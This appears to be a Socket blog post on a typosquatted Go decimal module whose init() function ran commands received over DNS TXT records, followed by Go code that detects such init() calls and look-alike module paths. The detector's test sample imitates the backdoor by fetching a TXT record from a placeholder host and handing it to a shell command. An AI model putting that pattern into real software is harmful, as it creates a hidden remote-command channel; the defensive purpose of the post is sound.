Popular Go Decimal Library Targeted by Long-Running Typosquat with DNS Backdoor
Blog post from Socket
Socket's Threat Research Team discovered a malicious Go module, github.com/shopsprint/decimal, a typosquat of the legitimate github.com/shopspring/decimal library used for arbitrary-precision fixed-point decimal arithmetic in the Go ecosystem. The module was weaponized on August 19, 2023: version v1.3.3 introduced an init() function that opens a command-and-control channel over DNS TXT records to a subdomain controlled by the threat actor, and the commands it receives can be executed on any machine that builds or runs code importing the module.

The attack follows a "trust-then-poison" pattern: the module looked benign for years before the malicious version was published. Because Go runs a package's init() functions whenever the package is imported, directly or transitively, the backdoor executes in the background with no user-visible output and without the importing code ever calling into the library.

Although the shopsprint GitHub repository and owner account have since been removed, the malicious version remains available through proxy.golang.org. Go's reproducibility model, under which the module proxy caches published module versions indefinitely, means a dependency that resolves to v1.3.3 keeps resolving to it. The incident highlights how typosquatting can compromise software supply chains and underscores the importance of vigilant dependency management: review new and changed dependencies by module path, not just by package name, and treat a version bump on a long-dormant module as a reason to look at what changed.
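Two checks a practitioner would want after reading this, written here as an added example that is not code from the Socket post or from either decimal module. The first parses a Go source file with go/parser and flags any init() function that directly calls name-resolution or process-execution functions, the combination the post describes; the second compares the module paths in a go.mod against an allow-list of known dependencies and reports look-alike paths within a small edit distance. The risky-call table, the allow-list, and the sample source (which mimics the described pattern against the reserved host example.invalid and is not the actual malicious code) are constructed for this example.

```go
package main

import (
	"fmt"
	"go/ast"
	"go/parser"
	"go/token"
	"strings"
)

// riskyCalls lists functions that have no business in an init():
// DNS lookups usable as a C2 channel and process execution.
// Keyed by import path, then by function name (assumed list, extend as needed).
var riskyCalls = map[string]map[string]bool{
	"net":      {"LookupTXT": true, "LookupHost": true, "Dial": true},
	"os/exec":  {"Command": true, "CommandContext": true},
	"net/http": {"Get": true, "Post": true},
}

// SuspiciousInits parses one Go file and reports each risky call made
// directly inside a package-level init() function.
func SuspiciousInits(filename, src string) ([]string, error) {
	fset := token.NewFileSet()
	f, err := parser.ParseFile(fset, filename, src, 0)
	if err != nil {
		return nil, err
	}
	// Resolve local import names (including aliases) to import paths.
	imports := map[string]string{}
	for _, imp := range f.Imports {
		path := strings.Trim(imp.Path.Value, `"`)
		name := path[strings.LastIndex(path, "/")+1:]
		if imp.Name != nil {
			name = imp.Name.Name
		}
		imports[name] = path
	}
	var findings []string
	for _, decl := range f.Decls {
		fn, ok := decl.(*ast.FuncDecl)
		if !ok || fn.Name.Name != "init" || fn.Recv != nil || fn.Body == nil {
			continue
		}
		ast.Inspect(fn.Body, func(n ast.Node) bool {
			call, ok := n.(*ast.CallExpr)
			if !ok {
				return true
			}
			sel, ok := call.Fun.(*ast.SelectorExpr)
			if !ok {
				return true
			}
			pkg, ok := sel.X.(*ast.Ident)
			if !ok {
				return true
			}
			path := imports[pkg.Name] // unknown ident -> "" -> nil map -> false
			if riskyCalls[path][sel.Sel.Name] {
				pos := fset.Position(call.Pos())
				findings = append(findings, fmt.Sprintf("%s:%d init() calls %s.%s",
					pos.Filename, pos.Line, path, sel.Sel.Name))
			}
			return true
		})
	}
	return findings, nil
}

// editDistance is the Levenshtein distance between a and b.
func editDistance(a, b string) int {
	prev, cur := make([]int, len(b)+1), make([]int, len(b)+1)
	for j := range prev {
		prev[j] = j
	}
	for i := 1; i <= len(a); i++ {
		cur[0] = i
		for j := 1; j <= len(b); j++ {
			cost := 1
			if a[i-1] == b[j-1] {
				cost = 0
			}
			cur[j] = prev[j-1] + cost
			if prev[j]+1 < cur[j] {
				cur[j] = prev[j] + 1
			}
			if cur[j-1]+1 < cur[j] {
				cur[j] = cur[j-1] + 1
			}
		}
		prev, cur = cur, prev
	}
	return prev[len(b)]
}

// LookAlikes maps each module path in modPaths that sits within maxDist
// edits of a known module (but is not that module) to the module it resembles.
func LookAlikes(known, modPaths []string, maxDist int) map[string]string {
	out := map[string]string{}
	for _, m := range modPaths {
		for _, k := range known {
			if m != k && editDistance(m, k) <= maxDist {
				out[m] = k
			}
		}
	}
	return out
}

// Constructed sample mimicking the described pattern; not the real module's code.
const sampleSrc = `package decimal

import (
	"net"
	"os/exec"
)

func init() {
	txt, _ := net.LookupTXT("example.invalid")
	if len(txt) > 0 {
		_ = exec.Command("sh", "-c", txt[0])
	}
}
`

func main() {
	findings, err := SuspiciousInits("decimal.go", sampleSrc)
	if err != nil {
		panic(err)
	}
	for _, f := range findings {
		fmt.Println(f)
	}
	known := []string{"github.com/shopspring/decimal"}
	mods := []string{"github.com/shopsprint/decimal", "github.com/shopspring/decimal", "golang.org/x/text"}
	for squat, real := range LookAlikes(known, mods, 2) {
		fmt.Printf("%s looks like %s\n", squat, real)
	}
}
```

The init() scanner only catches direct calls; a module that hides the lookup behind a helper function or the reflect package needs the walk extended to every function reachable from init(), which is the natural next step. The edit-distance check is cheap enough to run against every `require` line in go.mod in CI, with the allow-list built from the module paths your project already trusts.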